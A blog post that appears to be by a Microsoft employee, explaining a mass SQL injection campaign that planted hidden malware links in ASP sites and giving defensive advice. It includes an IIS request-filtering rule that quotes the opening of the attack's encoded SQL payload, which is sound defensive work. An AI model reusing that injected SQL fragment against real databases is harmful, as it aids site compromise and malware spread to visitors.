Hacked Web Applications causing storm - rattling Windows...

For the past few days a "Cyber attack" has been taking place and according to internetnews.com :

"number of infected IIS servers at 282,000. Less than a day later, security firm F-Secure wrote its own blog entry , putting the infestation at over 500,000"

and f-secure :

"Performing a Google search results in over 510,000 modified pages."

Without pointing out the reporting inconsistencies between servers and pages .... what is actually happening here..

First of all its not at all related to the security advisory that was released last week. Nor is it in fact related to any other security issue with IIS, ASP, ASP.NET or Windows. It's really important to understand that, its all to do with dodgy and insecure development practices.

Well very simply put its an age old SQL injection attack on a web site that modifies the return code adding a hidden link to a site that downloads malware to client viewing the web page. Nothing new technology wise here, just a new method of delivery - which really should not affect those who have kept their machines up-to-date.

In this case the attackers have chosen to target ASP/ASPX based web sites that have poorly written validation methods and deliver their code via a database content management system. The result being that pages on the site will return a hidden script tag that directs to one of the sites listed in the earlier articles - which picks on particular vulnerabilities available on the client machine, not just those related to software developed by Microsoft either.

Well that's all very nice you say - but "How do I protect myself against these kind of attacks?".

The way I see it, there are three areas of responsibility where lies the ability to protect the world against those few malicious people.

1. The Developer - FIX YOUR BROKEN CODE! Seriously - check your code for possible attack vectors and test, test test. I've seen heaps of web sites and web servers compromised due to poorly written or no validation checking. Incorrect security settings deploying to high risk environments. Don't always assume you know who is going to access your app. Don't assume that app will exist with everything local to it. Catch those errors - I could go on. There is heaps of guidance around this - here is a few to start you off:

• Web Development Best practices
• SQL injection mitigation

2.The Client - Keep your machine up-to-date - as Coatsy says "go to update.microsoft.com and Download the golden padlock of goodness" from Microsoft Update.

3. The System Admin / Hoster / Guy who has to run the web server - Hey I sympathise with you most (of course I would!) You have to get a site with poorly written code up and running, and now what? you have to check the thing isn't going to compromise your server? but of course the code supplied doesn't work in your standard low security settings to you need to bend the rules to allow that code to work.. Be Strong!

• ASP.NET trust levels
• Securing ASP.NET in Shared Server

But you may have been too late, and you have to clean this mess up on your server - how are you going to prevent this malicious code being delivered to and from your server, while keeping everything up and running?

Stop the attack coming in

If you are using IIS7 or URLScan on IIS6.0/5.1 you can filter the request to prevent the incoming attacks. In IIS7 This is what the configuration string looks like in your server wide applicationhost.config file (based on the info in articles):

<requestFiltering>
<denyUrlSequences>
<add sequence="DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300" />
</denyUrlSequences>
</requestFiltering>

Stop it going out

This is a little trickier, but due to the awesome modularity of IIS7 (only going to look at this) you can very easily write a module that can look in all the requests scan for the URL sequence in the response and send it to null. More information on doing this is at the IIS.NET website. Hey, if I get enough comments I'll write one and post it up here!

Done and Dusted

What we all need to remember about these kind of attacks is that vulnerability in the web sites being targeted are not limited to just a particular operating system platform. SQL Injection attacks is rampant in many platform agnostic applications and its such a simple thing to prevent.

As you have probably guessed I'm pretty passionate about this subject, and when I see such misguided reports and irrational reactions to incorrect or misunderstood information, it inspires me to ensure that the truth of the issue is available. Speaking personally; In my short time at Microsoft, I have never seen such commitment behind ensuring that the Windows Operating System is the most versatile and secure operating system on earth.

- jorke

Note: Graphics "borrowed" from Microsoft Japan Security Bulletins

Technorati Tags: SQL Injection,Security Vunerability,IIS,Windows,Microsoft